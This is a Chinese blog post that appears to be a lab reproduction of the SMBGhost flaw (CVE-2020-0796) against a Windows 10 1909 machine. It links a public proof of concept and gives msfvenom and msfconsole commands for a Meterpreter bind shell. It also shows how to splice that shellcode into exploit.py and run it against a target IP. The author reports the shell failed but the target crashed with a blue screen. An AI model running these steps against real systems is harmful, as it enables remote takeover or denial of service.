WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏

exploit:https://codechina.csdn.net/mirrors/chompie1337/SMBGhost_RCE_PoC?utm_source=csdn_github_accelerator

目标主机

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第1张图片

把防火墙关了

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第2张图片

 

关闭后可以ping通之后

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第3张图片

连接反向木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第4张图片

看到buf=。。。。这些编码全部复制下来

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第5张图片

双击打开我们下载好的exploit.py

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第6张图片

往下拉找到以USER_PAYLOAD开头的编码,将我们刚刚复制的替换上去

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第7张图片

然后把全部buf改为USER_PAYLOAD,替换完后保存

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第8张图片

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第9张图片

启动美少妇(msfconsole)

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第10张图片

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第11张图片

payload:

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6

exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

payload => windows/x64/meterpreter/bind_tcp msf6

exploit(multi/handler) > set loprt 4444

loprt => 4444

msf6 exploit(multi/handler) > set rhost 目标ip地址

rhost => 192.168.xx.132 msf6 exploit(multi/handler) > options

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第12张图片

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第13张图片

run之后等待连接,这时候我们重新开个终端运行我们刚刚修改过的exploit.py

正常情况下输入:python3 exploit.py -ip 目标ip地址

就会获取getshell

还可以蓝屏按道理我这个镜像的这个编号漏洞没打补丁才是,但是一直报physical read primitive failed!我也不知道咋搞,就到这吧,虽然没拿到getshell,后面有空再安装个win10 1903的版本,我这个是1909 x64的

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第14张图片

python exploit.py -ip 目标ip地址

用python2运行直接蓝屏

WIN10永恒之黑CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏_第15张图片

你可能感兴趣的:(Nday漏洞复现,安全漏洞,网络安全,信息安全)